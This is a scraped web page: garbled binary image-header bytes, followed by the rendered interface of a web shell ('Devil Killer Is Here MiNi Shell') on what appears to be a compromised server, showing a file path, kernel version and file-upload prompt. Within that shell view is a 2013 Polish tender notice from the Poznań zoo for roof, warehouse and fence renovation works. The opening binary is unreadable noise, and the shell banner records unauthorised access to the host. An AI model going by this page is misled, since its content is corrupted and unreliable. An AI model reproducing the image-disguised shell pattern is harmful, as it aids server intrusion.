JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/295198-N-2013.html

<p class="kh_header"><b>Poznań: Modernizacja stajenek zwierząt kopytnych (Tomi), wilka grzywiastego i kazuara na terenie Nowego Zoo w Poznaniu, modernizacja magazynu głównego na terenie Nowego Zoo w Poznaniu, renowacja ogrodzenia wokół terenu Starego Zoo w Poznaniu- etap I</b><br>
<b>Numer ogłoszenia: 295198 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ogród Zoologiczny w Poznaniu , ul. Browarna 25, 61-063 Poznań, woj. wielkopolskie, tel. 061 8768209, faks 061 8773533.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna nieposiadająca osobowości prawnej- Ogród Zoologiczny.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja stajenek zwierząt kopytnych (Tomi), wilka grzywiastego i kazuara na terenie Nowego Zoo w Poznaniu, modernizacja magazynu głównego na terenie Nowego Zoo w Poznaniu, renowacja ogrodzenia wokół terenu Starego Zoo w Poznaniu- etap I.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane, których część stanowi zadanie nr:

1)	modernizacja stajenek zwierząt kopytnych (Tomi), wilka grzywiastego, kazuara na terenie Nowego Zoo w Poznaniu,
2)	modernizacja magazynu głównego na terenie Nowego Zoo w Poznaniu,
3)	renowacja ogrodzenia wokół terenu Starego Zoo w Poznaniu - etap I.


W zakresie zadania nr 1:

Zakres robót budowlanych obejmuje: wymianę pokrycia dachowego z wykonaniem ocieplenia z wełny mineralnej tj. wymianę uszkodzonych elementów drewnianej więźby dachowej w stajence zwierząt kopytnych, prace dekarskie przy wymianie poszycia dachu z wymianą rynien, rur spustowych i obróbek blacharskich, przy wykonywaniu pokrycia dachu w zakresie robót modernizacyjnych znajdą się również roboty budowlane (ocieplenie stropodachu, malowanie ścian). Dachy należy kryć papą termogrzewalną SBS-em gr. 5,2 mm. Roboty malarskie obejmują dwukrotne malowanie farbą emulsyjną białą powierzchni wewnętrznych- tynków gładkich, dwukrotne malowanie farbami olejnymi uprzednio malowanych powierzchni drewnianych, dwukrotne malowanie farbą olejną brązową uprzednio malowanych elementów drewnianych.

Prace rozbiórkowe:
	-rozebranie rynien z tworzyw sztucznych,
	-rozebranie rur spustowych z tworzyw sztucznych,
	-rozebranie pokrycia dachowego z papy na deskowaniu,
	-rozebranie pokrycia z gontów,
	-rozebranie częściowe deskowania dachu z desek na styk

Prace blacharskie:
`	-uzupełnienie obróbek blacharskich z blachy ocynkowanej,
	-wymiana pasów nad i pod rynnowych,
	-montaż rynien z blachy ocynkowanej,
	-montaż rur spustowych,

Roboty pokrywcze:
	-wykonanie nowego deskowania z desek o gr.25 mm,
	-ułożenie podkładu z papy podkładowej w miejscach wymiany deskowania,
	-pokrycie całości dachu  papą termozgrzewalną SBS -em gr. 5,2 mm,
	-pokrycie  gontami papowymi połaci dachu od strony wybiegu,

Prace nad konstrukcją dachu:
	-naprawa uszkodzonych elementów konstrukcyjnych wiązarów deskowych poprzez 	wzmocnienie dodatkowymi elementami z desek,

Prace wykończeniowe i izolacyjne:
	- wymiana połaci zniszczonego sufitu, wykonanie nowego pokrycia płytą OSB,
	- wykonanie  ocieplenia stropodachu płytami z wełny mineralnej  gr.100mm,
	- malowanie całości  pomieszczeń od wewnątrz, dwukrotnie farbami emulsyjnymi,
	- malowanie elewacji zewnętrznej, 
	- wykonanie kominków wentylacyjnych do wentylacji pomieszczeń.

Zgodnie z dokumentacją techniczną stanowiącą załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ)

W zakresie zadania nr 2:

Zakres robót budowlanych obejmuje roboty budowlane związane z modernizacją Magazynu Głównego i adaptacją wiaty magazynowej na terenie Nowego Zoo:
                   
            Prace  pokrywcze Magazynu Głównego:
           - zdemontowanie poziomej instalacji odgromowej na dachu,
	-  naprawienie istniejącego pokrycia dachowego przez wyrównanie i wstawienie łat z papy,
	- oczyszczenie podłoża pod nowe pokrycie,
	- wykonanie nowego  pokrycia dachowego  z papy termozgrzewalnej  
 	  SBS grub.5,2 mm wierzchniego krycia na istniejącym podłożu ,
	- wykonanie obróbek blacharskich na murkach ogniowych,
-	założenie na dachu zdemontowanej instalacji odgromowej.

	Termo modernizacja ścian świetlika :
           - rozebranie istniejącej zniszczonej stolarki okiennej ścian świetlika
	 od strony stawu i parkingu,
-	wykonanie konstrukcji z desek grub.25 mm lub łat 4x4 cm w miejscu
	rozebranej stolarki okiennej, pod montaż blach trapezowych,  
     - wykonanie ocieplenia ścian świetlika ze styropianu EPS 70 grub. 15 cm,
-	wykonanie montażu blach trapezowych powlekanych o przetłoczeniach T- 10 
	mm ścian bocznych świetlika na wys. 1,40 m ,
	     
           Posadzka Magazynu Głównego: (komunikacja)
     -  rozebranie istniejącej posadzki betonowej,
-	usunięcie z budynku gruz poza obręb magazynu,
-	wykorytowanie i wyrównanie podłoża,
-	wykonanie warstwy odsączającej grub.10 cm z piasku,
-	wykonanie podbudowy z gruzu po skutej posadzce,
-	wykonanie podłoża posadzkowego z betonu B-15 grub.10 cm na ustabilizowanej 
	warstwie gruzu, 
     - zagruntowanie środkiem gruntującym warstwy pod posadzkowej,
-	wykonanie warstwy wygładzającej z zaprawy,
                     
            Stolarka :
-	wymiana zniszczonej stolarki 3- ech bram wjazdowych - ściana szczytowa
	zachodnia i wschodnia,
-	wykucie ościeżnic drzwi wejściowych do magazynu ściana szczytowa
	wschodnia,
-	wykucie ościeżnicy drewnianej okiennej - ściana szczytowa wschodnia,
-	montaż drzwi stalowych wejściowych do magazynu,
-	osadzenie stolarki okiennej z profili PCV,
                  
            Prace elewacyjne :
-	zdemontowanie  do dalszego użytku obróbek blacharskich (rury spustowe),
-	zdemontowanie instalacji odgromowej na ścianach,
-	skucie odspojonych od podłoża ścian luźnych tynków,
-	oczyszczenie podłoża ścian ,

Tynki:
-	uzupełnienie nowych tynków cementowo-wapiennych III kat,
-	zagruntowanie powierzchni ścian środkiem gruntującym,
-	wykonanie tynku o strukturze baranka o uziarnieniu 2 mm,
-	pomalowanie farbą silikatową tynki fakturowe elewacji,
-	założenie zdemontowanych rury spustowych od strony południowej,
-	założenie zdemontowanej pionowej instalacji odgromowej na ścianach,          
	
           Adaptacja  wiaty  przy  Magazynie  Głównym :
	
           -  rozebranie skorodowanej konstrukcji wiaty,
-	wykonanie i zamontowanie  konstrukcji  stalowej wiązarów wg. załączonej
	dokumentacji , 
     - wykonanie i zamontowanie konstrukcji  nośnej - słupów z kształtowników
       zamkniętych 90x90x3 wg dokumentacji,
-	wykonanie  stop fundamentowych,          
     -  zamontowanie łat  60 x80 mm co 20 cm pod pokrycie dachowe,
-	pokrycie wiaty blachą trapezową  powlekaną o przetłoczeniach trapezowych T - 20 mm,
     - ułożenie kalenicy prostej ,
          -  osiatkowanie z trzech stron ściany wiaty  siatką oc. powlekaną o oczkach
	50x50 mm,
-	umocowanie w ścianie tylnej siatki do słupka ogrodzeniowego,     
           - oczyszczenie elementów stalowe konstrukcji szczotką stalową do III-go stopnia,
-	 pokrycie całości konstrukcji powłokami antykorozyjnymi i pomalowanie farbą
       zewnętrznego stosowania,
-	wykorytowanie powierzchni na całej szerokości jezdni,
-	wyprofilowanie i zagęszczenie podłoża,
-	wykonanie warstwy odsączającej grub.10 cm,
-	ułożenie kostki betonowej grub.6 cm (szara)na podsypce cem.-piaskowej,
-	wykonanie ławy cementowo -piaskowej pod ułożenie obrzeży trawnikowych
-	ułożenie obrzeży trawnikowych,

Zamontowanie wewnątrzzakładowej stacji paliw na posadzce wiaty, wg typu ustalonego przez inwestora


Zgodnie z dokumentacją techniczną stanowiącą załącznik do Specyfikacji Istotnych Warunków Zamówienia (SIWZ).

W zakresie zadania nr 3:

Roboty dotyczą renowacji ogrodzenia wokół Starego Zoo w Poznaniu, zlokalizowanego przy ulicy Zwierzynieckiej 19 w Poznaniu.  Zakres robót budowlanych obejmuje renowację i przebudowę ogrodzenia od strony ul. Bukowskiej -część południowa ogrodzenia od przęsła 1 do 59 (remont) i 1n-25n (odbudowa) przy ul. Bukowskiej, renowację i przebudowę ogrodzenia od strony ul. Gajowej -część wschodnia ogrodzenia od przęsła 5 do 35 przy ul. Gajowej, przebudowę ogrodzenia od strony ul. Zwierzynieckiej -fragment części północnej ogrodzenia od przęsła 32n do 79n przy ul. Zwierzynieckiej (od budynku toalet do istniejących historycznych przęseł przy budynku bramy wejściowej, wraz z renowacją stalowych bram wejściowych i napisu Ogród Zoologiczny).

Roboty rozbiórkowe i demontażowe: 
- Rozbiórka fragmentów ogrodzenia przy ul. Zwierzynieckiej, ul. Gajowej oraz całego ogrodzenia od strony ul. Bukowskiej,
- Obniżenie ścianki pomiędzy słupkami przy ul. Gajowej,
- Demontaż istniejących krat ogrodzeniowych,
- Demontaż czap betonowych zwieńczających słupy, 
- Wykonanie wykopu pod fundamenty,
- Wywóz materiałów z rozbiórki z opłatą wysypiskową i opłatą utylizacyjną,

Roboty przygotowawcze i ziemne: 
- zebranie warstwy humusu z wywiezieniem poza teren inwestycji, 
- wykonanie wykopów liniowych z wywozem urobku, 
- zasypanie wykopów piaskiem dowiezionym, 
- zabezpieczenie wykopu przed opadami i ewentualne odwodnienie wykopu,

Roboty żelbetowe i betonowe:
- wykonanie betonów monolitycznych: 
- wykonanie ław i stóp fundamentowych, 
- wykonanie słupów żelbetowych, 
- wykonanie czap betonowych zwieńczających słupy oraz nakryw betonowych na podmurówce, 
- osadzenie w betonie okuć, kotew, marek, dylatacji,

Roboty zbrojarskie obejmujące wykonanie zbrojenia: 
- ław i stóp fundamentowych, 
- słupów żelbetowych, 
- osadzenie w betonie okuć, kotew, marek, dylatacji, 

Roboty murowe:
-wykonanie podmurówki z bloczków betonowych gr. 25 cm 
- wymurowanie ścian z bloczków silikatowych kl.15 gr. 18 cm pomiędzy słupami przy ul. Gajowej, 

Roboty instalacyjne 
- wykonanie izolacji przeciwwilgociowej fundamentów ogrodzenia i podmurówki z bloczków betonowych,

Budowa ogrodzenia od strony ulicy Zwierzynieckiej oraz Bukowskiej.
 W ramach prac przewiduje się: 
- rozbiórkę fragmentu historycznego muru od strony ulicy Zwierzynieckiej (od budynku toalet w kierunku wschodnim z wyłączeniem przęseł przy bramie wejściowej), 
- rozbiórkę istniejącego ogrodzenia z siatki od strony ul. Zwierzynieckiej oraz Bukowskiej wraz z podmurówką, 
- wywóz gruzu i innych odpadów, 
- deskowanie konstrukcji żelbetowej fundamentów oraz słupów nowego ogrodzenia, 
- transport, składowanie oraz przygotowanie, wygięcie, przycięcie i łączenie prętów stalowych zbrojenia słupów oraz fundamentów, montaż zbrojenia elementów żelbetowych, 
- wykonanie hydroizolacji, 
- wylanie ław fundamentowych i słupów z betonu monolitycznego B-20, 
- wykonanie podmurówki z bloczków betonowych, 
- wykonanie i nałożenie nakryw betonowych na zwieńczeniach słupów i podmurówki, 
- nałożenie tynku mineralnego, 
- malowanie farbą akrylową, 
- wykonanie oraz przygotowanie do montażu (w tym malowanie) stalowych krat ogrodzeniowych, 

Roboty tynkarskie zewnętrzne: 
- wykonanie tynku mineralnego na murach, 
- wykonanie tynku mineralnego na elementach żelbetowych, 
- wykonanie tynku mineralnego na elementach betonowych, 

Roboty malarskie:
- naniesienie koloru na zewnętrzny tynk mineralny 
- pomalowanie elewacji budynków gospodarczych, w których nie przewidziano zdejmowanie istniejących tynków, 
- zabezpieczenie antykorozyjne elementów stalowych, 
- pomalowanie elementów stalowych,

Roboty remontowe:
- demontaż krat stalowych, 
- renowacja i przebudowa krat stalowych, 
- demontaż zwieńczeń słupów, 
- wyburzenie części muru ogrodzenia o złym stanie technicznym, odbudowa muru (wylanie fundamentów i słupów, budowa podmurówki, budowa muru pomiędzy słupami, wykonanie hydroizolacji, nałożenie nakryw betonowych na zwieńczenia słupów i murów między słupami, montaż krat ogrodzeniowych),
- montaż marek do łączenia krat ogrodzeniowych, 
- uzupełnienie ubytków w murze, 
- obniżenie murów pomiędzy słupami, 
- zdjęcie istniejących tynków, 
- nałożenie nakryw betonowych na zwieńczenia słupów i murów pomiędzy słupami, 
- nałożenie tynków, 
- pomalowanie muru farbą akrylową, 
- wywiezienie gruzu,
- budynek bramy wejściowej: odnowienie historycznych bram - wypiaskowanie, pomalowanie, odnowienie napisu: Ogród Zoologiczny..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.11.11.00-9, 45.11.12.20-6, 45.11.13.00-1, 45.11.12.00-0, 45.20.00.00-9, 45.22.35.00-1, 45.26.22.10-6, 45.26.23.00-4, 45.26.23.10-7, 45.26.25.00-6, 45.30.00.00-0, 45.32.00.00-5, 45.34.20.00-6, 45.40.00.00-1, 45.40.00.00-4, 45.44.21.00-8, 45.44.22.00-9, 45.44.23.00-0, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> a) Wykonawca zobowiązany jest wnieść w odniesieniu do części 1 zamówienia wadium w wysokości: 1000,00 zł (słownie: jeden tysiąc złotych).
b) Wykonawca zobowiązany jest wnieść w odniesieniu do części 2 zamówienia wadium w wysokości: 2500,00 zł (słownie: dwa tysiące pięćset złotych).
c) Wykonawca zobowiązany jest wnieść w odniesieniu do części 3 zamówienia wadium w wysokości: 11000,00 zł (słownie: jedenaście tysięcy złotych).


Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas gdy przed upływem terminu składania ofert kwota wniesionego wadium będzie uznana na rachunku bankowym Zamawiającego. Zaleca się, aby kopię dowodu wniesienia wadium załączyć do oferty. 

Wadium może być wnoszone w jednej lub kilku następujących formach:

a)    pieniądzu;
przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski, numer: 31 1050 1520 1000 0023 4950 5848; 
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d)   gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 

Zwrot lub zatrzymanie wadium następuje na zasadach określonych w art. 46 Ustawy. 

Wadium wnoszone w innej niż pieniądz formie musi posiadać ważność co najmniej do końca terminu związania Wykonawcy złożoną przez niego ofertą. 

W przypadku wniesienia wadium w innej formie niż pieniądz należy załączyć do oferty odpowiedni dokument, nie spięty w całość z ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadania nr 1:

- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zadania, każde polegające na wykonaniu robót budowlanych o wartości nie mniejszej niż 45.000 zł (słownie: czterdzieści pięć tysięcy złotych). 

-  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wszystkie wykonane przez niego roboty budowlane, tj. o wartości nie mniejszej niż 45.000 zł każda zostały wykonane należycie.  

Za najważniejsze roboty budowlane Zamawiający uznaje roboty o wartości nie mniejszej niż 45.000 zł każda.

W zakresie zadania nr 2:

- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zadania, każde polegające na wykonaniu robót budowlanych o wartości nie mniejszej niż 100.000 zł (słownie: sto tysięcy złotych). 

-  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wszystkie wykonane przez niego roboty budowlane, tj. o wartości nie mniejszej niż 100.000 zł każda zostały wykonane należycie.  

Za najważniejsze roboty budowlane Zamawiający uznaje roboty o wartości nie mniejszej niż 100.000 zł każda.


W zakresie zadania nr 3:

- w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 zadania, każde polegające na wykonaniu robót budowlanych o wartości nie mniejszej niż 450.000 zł (słownie: czterysta pięćdziesiąt tysięcy złotych). 

-  w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wszystkie wykonane przez niego roboty budowlane, tj. o wartości nie mniejszej niż 450.000 zł każda zostały wykonane należycie.  

Za najważniejsze roboty budowlane Zamawiający uznaje roboty o wartości nie mniejszej niż 450.000 zł każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadania nr 1:

- dysponuje lub będzie dysponować minimum 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, w specjalności konstrukcyjno - budowlanej bez ograniczeń, 

W zakresie zadania nr 2:

- dysponuje lub będzie dysponować minimum 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, w specjalności konstrukcyjno - budowlanej bez ograniczeń, 

W zakresie zadania nr 3:

- dysponuje lub będzie dysponować minimum 1 osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, w specjalności konstrukcyjno - budowlanej bez ograniczeń oraz posiadającą co najmniej 2-letnią praktykę zawodową na budowie przy zabytkach nieruchomych zgodnie z § 24 ust. 2 Rozporządzenie Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011 r. w sprawie prowadzenia prac konserwatorskich, prac restauratorskich, robót budowlanych, badań konserwatorskich, badań architektonicznych i innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych(Dz. U. z dnia 11 sierpnia 2011 r.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadania nr 1:

podlega ubezpieczeniu od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 45.000 zł (słownie: czterdzieści pięć tysięcy złotych). 


W zakresie zadania nr 2:

podlega ubezpieczeniu od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 100.000 zł (słownie: sto tysięcy złotych). 

W zakresie zadania nr 3:

podlega ubezpieczeniu od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, związanej z przedmiotem zamówienia, o wartości nie mniejszej niż 450.000 zł (słownie: czterysta pięćdziesiąt tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
